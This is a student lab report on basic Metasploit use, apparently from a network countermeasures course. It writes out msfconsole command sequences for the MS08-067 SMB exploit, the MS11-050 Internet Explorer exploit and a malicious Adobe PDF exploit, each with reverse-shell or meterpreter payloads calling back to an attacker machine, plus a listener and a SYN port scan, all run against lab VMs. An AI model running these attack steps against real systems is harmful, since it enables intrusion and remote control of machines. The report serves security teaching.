2017-2018-2 20155319 "Network Countermeasure Technology" Exp5: MSF Basic Application
basic question answer
- Explain what is exploit, payload, encode in your own words
exploit
: A process in which users exploit vulnerabilities to attack, which is a vehicle.payload
: Attack payload, such as backdoor and other attack codes.encode
: used for encoding, used for camouflagepractice process record
1. Windows Service Penetration Attack - MS08-067 Security Vulnerability
①攻击机:kali ②靶机:windows XP SP3(English)
Can be pinged.
Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:
msf >
search ms08-067
//Use the search command to search for information about the vulnerability MS08_067
- msf >
use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)>
show payloads
//View the payload we can use:
- msf exploit(ms08_067_netapi)>
set payload generic/shell_reverse_tcp
//tcp reverse connection - msf exploit(ms08_067_netapi) >
set LHOST 192.168.72.131
attacker ip - msf exploit(ms08_067_netapi)>
set LPORT 5319
- msf exploit(ms08_067_netapi)>
set RHOST 192.168.72.135
//target ip msf exploit(ms08_067_netapi)>
set target 0
//Automatically select the target system type
- msf exploit(ms08_067_netapi) >
exploit
success! The results of the attack are as follows:
2. Browser Penetration Attack - MS11-050
①攻击机:kali ②靶机:WindowsXP Professional sp2/Windows7专业版 ③IE版本:7.0/8.0
Enter the kali input msfconsole
into the console of the attack aircraft, and enter the following commands in sequence:
- msf >
use windows/browser/ms11_050_mshtml_cobjectelement
- msf exploit(ms11_050_cobjectelement) >
set payload windows/meterpreter/reverse_http
//http reverse link - msf exploit(ms11_050_cobjectelement) >
set LHOST 192.168.72.131
//attack machine ip - msf exploit(ms11_050_cobjectelement) >
set LPORT 5319
//fixed attack port - msf exploit(ms11_050_cobjectelement) >
set URIPATH rhl19
//Uniform resource identifier path setting - msf exploit(ms11_050_cobjectelement) >
exploit
Successfully get Local ip:
Access http://192.168.72.131:8080/rhl19 with the target drone, a pop-up warning appears:
Try to modify the relevant settings of the IE browser to reduce its security level
The second time I tried to access the above URL in IE, it still failed... very sad...
3. Client-side attacks Adobe
①攻击机:kali ②靶机:windowsXP Professional sp2 ③Adobe版本:9.3
Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:
- msf >
use windows/fileformat/adobe_cooltype_sing
- msf exploit(adobe_cooltype_sing) >
set payload
windows/meterpreter/reverse_tcp //tcp reverse connection - msf exploit(adobe_cooltype_sing) >
set LHOST 192.168.72.131
//attack machine ip - msf exploit(adobe_cooltype_sing) >
set LPORT 5319
//attack port - msf exploit(adobe_cooltype_sing) >
set FILENAME 20155319.pdf
//Set the name of the generated pdf file - msf exploit(adobe_cooltype_sing) >
exploit
//attack The pdf was generated successfully.
Since the generated file is a hidden file, use the copy command to copy it to another directory.
After transferring or copying the pdf file to the target machine, enter back on kali to exit the current module, enter the monitoring module, and enter the following command:
msf > use exploit/multi/handler //进入监听模块 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接 msf exploit(handler) > set LHOST 192.168.72.131 //攻击机ip msf exploit(handler) > set LPORT 5319 //攻击端口固定 msf exploit(handler) > exploit
Then open the pdf file on the target machine, and the connection is successful.
4. Metasploit - Information Collection Module
1. Scan port
- msf > use auxiliary/scanner/portscan/syn (use portscan module)
- msf auxiliary(syn) > show options
- msf auxiliary(syn) > set RHOSTS 192.168.72.137 (target)
- msf auxiliary(syn) > set THREADS 50 (threads)
- msf auxiliary(syn) > Exploit
terminated early due to long scan time.
2. Scan the TCP port usage of the target machine
Enter the following commands:
run to open the scan, you can see the usage of all tcp ports on the winxp target machine
Practice summary and experience
There is nothing particularly difficult in this experiment. It is mainly in the configuration of the environment. I have configured it myself for a long time but it is still unsuccessful. Finally, I copied the configured virtual machine. Experienced the specificity of metasploit attack vulnerabilities, and has detailed requirements for operating systems and software versions. It must be successful under certain circumstances and under certain trigger conditions. Feel the gap between practice and real attack.